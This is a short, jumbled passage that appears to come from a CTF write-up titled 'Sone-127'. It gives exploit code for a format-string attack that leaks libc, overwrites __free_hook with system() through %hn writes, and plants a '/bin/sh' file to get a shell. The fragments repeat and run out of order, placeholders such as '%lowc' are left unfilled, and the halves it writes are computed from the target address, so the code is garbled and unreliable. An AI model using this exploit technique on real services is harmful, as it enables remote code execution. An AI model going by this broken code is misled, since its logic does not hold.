2021 — Sone-127

# 1️⃣ Leak libc libc_base = leak_libc(io)

payload = b'A'*8 # padding for alignment payload += f"%lowc%8$hn".encode() payload += f"%high-lowc%9$hn".encode() payload += b'B'*8 payload += p64(target) # argument 8 payload += p64(target+2) # argument 9 Send the payload with echo and the service writes the low and high halves of system into __free_hook . Now we need a chunk that contains the string "/bin/sh" . The simplest way is to upload a file named sh.txt with that exact content. SONE-127 2021

target = free_hook low = target & 0xffff high = (target >> 16) & 0xffff # 1️⃣ Leak libc libc_base = leak_libc(io) payload